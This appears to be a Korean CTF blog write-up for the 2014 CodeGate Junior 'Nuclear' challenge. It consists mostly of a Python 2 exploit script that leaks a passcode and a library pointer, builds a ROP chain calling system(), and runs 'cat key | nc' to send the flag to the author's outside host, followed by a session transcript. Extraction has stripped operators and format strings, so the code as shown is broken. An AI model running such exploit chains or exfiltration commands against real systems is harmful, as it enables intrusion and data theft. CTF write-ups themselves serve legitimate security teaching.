

2014 CodeGate Junior PreQual - Nuclear [exploit]

0x10 정보보안/0x13 Write-Up

by sweetchip 2014. 2. 16. 14:32






nuclear_d4f699f3dbb8aadf7c224aa57f57eb4c


from socket import *

from struct import *

import time


# NOTE(review): this listing is Python 2 (print statements, str-based sockets)
# and was damaged by page extraction: both format strings below are cut off at
# the opening quote (text following a '<' was dropped by the HTML-to-text step),
# and the '+' operators elsewhere in the script are missing. Compare with the
# original post before reading any line as literal.
p = lambda x : pack("

up = lambda x : unpack("

# Two hosts are assigned back to back; only the second takes effect. The first
# is a private (RFC 1918) address, presumably the author's local test machine.
ip = "192.168.0.109"

ip = "58.229.183.22"

port = 1129


# Connects at import time with no timeout and no error handling, so a refused
# or hanging connection fails (or blocks) before any function below is defined.
s = socket(AF_INET, SOCK_STREAM)

s.connect((ip, port))


launchcode = "in the end, i was there." # this is passkey (initial value; replaced by the leaked value further down)


# Static addresses inside the challenge binary (0x0804xxxx range): two PLT
# entries and two wrapper routines. send_plt / recv_plt are not referenced by
# anything in this listing. These constants only stay valid if the binary is
# loaded at a fixed base (non-PIE) -- TODO confirm.
send_plt = 0x08048900

recv_plt = 0x080488e0

send_wrap = 0x08048a0d

recv_wrap = 0x08048a6f


# Library-range constant that nothing in the visible script reads; the mprotect
# address actually used is computed from the leaked pointer near the bottom.
mprotect_got = 0xb75f22b0

# Writable scratch address inside the binary; the payload builders use it as
# the destination buffer for data received from the client.
freespace = 0x0804b500


# Return-address constants derived from one base by successive increments (the
# names follow the pop-N/ret naming convention). As shown, "ppppr 1" is not
# valid Python; the '+' looks to have been lost in extraction -- confirm.
ppppr = 0x0804917c

pppr = ppppr 1

ppr = pppr 1

pr = ppr 1

r = pr 1


# Builds the first oversized "coordinate" input (sent with a trailing newline
# by the driver at the bottom of the file). As printed, every line re-assigns
# `payload`, so the function would return only "1" * 1000; the original almost
# certainly concatenated the pieces with '+=' and the '+' was lost in
# extraction -- confirm against the original post. Body indentation was also
# stripped, so this does not parse as shown.
def leak_payload1():

payload = ""

payload = "1" * 500

payload = "/"

payload = "1" * 1000

return payload


# Second oversized "coordinate" input; identical to leak_payload1 except for
# the leading "1." prefix. The server's echo of this input is what the driver
# below slices the launch code out of. Same extraction damage as above: the
# '+' of '+=' and the body indentation are missing, so as printed the function
# would return only "1" * 1000.
def leak_payload2():

payload = ""

payload = "1."

payload = "1" * 500

payload = "/"

payload = "1" * 1000

return payload


# Builds the input that overruns the stack buffer and chains a call to
# send_wrap so that the 4 bytes at 0x0804b00c are written back to the client.
# The driver below unpacks that reply as `setsockopt`, so 0x0804b00c is
# presumably that function's GOT slot -- TODO confirm against the binary. The
# three repeated 0x08048b5b / pr / 4 groups are not explained on the page. As
# printed, each line re-assigns `payload` (the '+' of '+=' was stripped) and
# the body indentation is gone.
def leak_setsock_got():

payload =""

# 0x20c bytes of filler reach the saved frame; "BBBB" lands on the next 4
# bytes (saved EBP, presumably) and everything after it is consumed as return
# addresses and arguments.
payload = "A" * 0x20c

payload = "BBBB"


# send_wrap(4, 0x0804b00c): send 4 bytes from the suspected GOT slot, then pop
# two stack slots and return.
payload = p(send_wrap)

payload = p(ppr)

payload = p(4)

payload = p(0x0804b00c)


payload = p(0x08048b5b)

payload = p(pr)

payload = p(4)


payload = p(0x08048b5b)

payload = p(pr)

payload = p(4)


payload = p(0x08048b5b)

payload = p(pr)

payload = p(4)


payload = p(0x08048b5b)

return payload


# Alternative payload: make the scratch region readable, writable and
# executable with mprotect, then receive `shellcode` into it. It is never
# called in the visible script (the author notes at the end that this route
# failed and switched to system), and it references `shellcode`, which is not
# defined anywhere in this listing -- calling it as shown raises NameError.
# From a hardening standpoint this is the W^X violation (prot 7 =
# PROT_READ|PROT_WRITE|PROT_EXEC on a data page) that an NX-aware seccomp or
# sandbox policy on mprotect would block. Same extraction damage as the other
# builders ('+=' printed as '=', indentation lost).
def mpro_exploit(mprotect): # mprotect payload

payload =""

payload = "A" * 0x20c

payload = "BBBB"


# mprotect(freespace, 3000, 7), then pop three slots and return.
payload = p(mprotect)

payload = p(pppr)

payload = p(freespace)

payload = p(3000)

payload = p(7)


# recv_wrap(4, freespace, len(shellcode)) -- `shellcode` is undefined here.
payload = p(recv_wrap)

payload = p(pr)

payload = p(4)

payload = p(freespace)

payload = p(len(shellcode))


return payload


# Payload actually used: receive a command string into the scratch buffer,
# call system() on it, then return to 0x08048b5b. The byte count handed to
# recv_wrap is computed from the exact command the driver sends afterwards
# ("cat key | nc ... \x00"); the two strings must stay identical or the recv
# reads short or long. Note that the command makes the server open an
# outbound connection to a fixed host/port -- that egress to an unfamiliar
# destination is the observable artifact on the defending side. Same
# extraction damage as the other builders ('+=' printed as '=', indentation
# lost).
def sys_exploit(system):

payload =""

payload = "A" * 0x20c

payload = "BBBB"


# recv_wrap(4, freespace, len(cmd)): pull the command text into the scratch
# buffer, then pop three slots and return.
payload = p(recv_wrap)

payload = p(pppr)

payload = p(4)

payload = p(freespace)

payload = p(len("cat key | nc 220.117.247.200 12071\x00"))


# system(freespace), pop one slot, return to 0x08048b5b.
payload = p(system)

payload = p(pr)

payload = p(freespace)


payload = p(0x08048b5b)

return payload


#########################[START EXPLOIT]##############################
# Session driver. Every read below is a bare s.recv with no timeout, and the
# replies are printed rather than checked, so any unexpected server response
# either hangs the script or silently derails the later slicing. Python 2
# print statements throughout. Several lines are missing a '+' that the page
# extraction dropped (noted inline).

print s.recv(1024)

print s.recv(1024)

s.send("target\n")

print s.recv(1024)

s.send(leak_payload1() "\n") # try to leak  (as printed the '+' before "\n" is missing)

##################[End LEAK FILE NAME - 1]############################

print s.recv(4096)

print s.recv(4096)

s.send("target\n")

print s.recv(4096)

s.send(leak_payload2() "\n") # try to leak File name  (same missing '+')

##################[End LEAK FILE NAME - 2]############################

print s.recv(4096)

# First line of the echo; the code is taken as its last 24 bytes (24 is the
# length of the passkey string hard-coded at the top). If the reply arrives in
# a different chunking than the author saw, this slice is silently wrong.
launchcode = s.recv(4096).split('\n')[0]

launchcode = launchcode[len(launchcode)-24:] # get launchcode

# As printed this replaces the leaked code with a bare newline; the original
# appended one ('+=') -- the '+' was lost in extraction.
launchcode = "\n"

print "LEAKED NUCLEAR LAUNCH CODE IS : " launchcode

##################[End LEAK FILE NAME - 3]############################

s.send("launch")

print s.recv(4096)

s.send(launchcode)

print s.recv(1024)

s.send(leak_setsock_got())

print s.recv(1024)

# Fixed sleeps stand in for real synchronization on the server's replies.
time.sleep(1)

# First 4 bytes of the reply -> leaked pointer. `up` is truncated above;
# presumably it unpacks to a single int, since hex() is applied directly.
setsockopt = up(s.recv(1024)[0:4])

print hex(setsockopt)

print s.recv(1024)

##################[ End LEAK SETSOCK 'GOT' ]##########################

# Offsets relative to the leaked pointer; they are specific to the library
# build on the challenge host and will not hold elsewhere. `mprotect` is
# computed but unused on this path (see the author's note at the end).
mprotect = setsockopt - 0x6810

system = setsockopt - 0xb2860

print hex(system)

#######################[ GOT SYSTEM PTR ]#############################

# Send the chain, then the command text it expects; the NUL terminator is
# counted in the length the chain passed to recv.
s.send(sys_exploit(system))

time.sleep(0.3)

s.send("cat key | nc 220.117.247.200 12071\x00")

time.sleep(0.3)

############################[ GET KEY ]###############################

# Drain whatever the server sends. With no timeout any of these blocks
# indefinitely once the server goes quiet, and the socket is never closed.
s.recv(1024)

s.recv(1024)

s.recv(1024)

s.recv(1024)

s.recv(1024)

s.recv(1024)

s.recv(1024)

##########################[ End Of File ]#############################

# Session transcript pasted by the author as a bare string literal -- a no-op
# expression statement, not a docstring. The two "0xb7...L" lines are the
# hex(setsockopt) and hex(system) prints from one run (they differ by exactly
# 0xb2860, the offset used above; the L suffix is a Python 2 long). The
# "넁%P" fragment is the 4 leaked bytes rendered as text. The "C:\Users\..."
# lines contain backslashes that Python 2 keeps literally in a byte string;
# under Python 3 "\U" in a non-raw literal would be a syntax error.
"""


"in the end, i was there." # this is passkey


######################################################################

:: Welcome to the Nuclear Control System ::



>

[ ] Enter coordinate of target, (Latitude/Longitude)

--->

[ ] Target coordinate setting completed.


> [!] Unknown command : 11111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111넁%P

> [!] Unknown command : 11111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111


>

[ ] Enter coordinate of target, (Latitude/Longitude)

--->

[ ] Target coordinate setting completed.


LEAKED NUCLEAR LAUNCH CODE IS : in the end, i was there.


[ ] Enter the passcode to launch the nuclear :

[ ] Correct passcode!


[2J[0;0H[5;5HIF YOU WANT CANCEL THIS OPERATION, ENTER THE CANCEL CODE




COUNT DOWN : 100

0xb76a8ac0L

[5;5HIF YOU WANT CANCEL THIS OPERATION, ENTER THE CANCEL CODE




COUNT DOWN : 99

0xb75f6260L


C:\Users\Administrator>


C:\Users\Administrator>nc -lvp 12071

listening on [any] 12071 ...

58.229.183.22: inverse host lookup failed: h_errno 11004: NO_DATA

connect to [192.168.0.93] from (UNKNOWN) [58.229.183.22] 45227: NO_DATA

BUG_BOUNTIES_b3COM3_GrEAT

"""

# Key : BUG_BOUNTIES_b3COM3_GrEAT  (the flag, received on the author's listener above)

##############################[ Result ]##############################


Key : BUG_BOUNTIES_b3COM3_GrEAT


처음에 mprotect로 시도했는데 잘 안 돼서 system으로 전환했더니 잘 된다.


이럴 수가! [근데 cd80의 풀이를 보니 mprotect도 잘 되는 것 같았다... -_-]


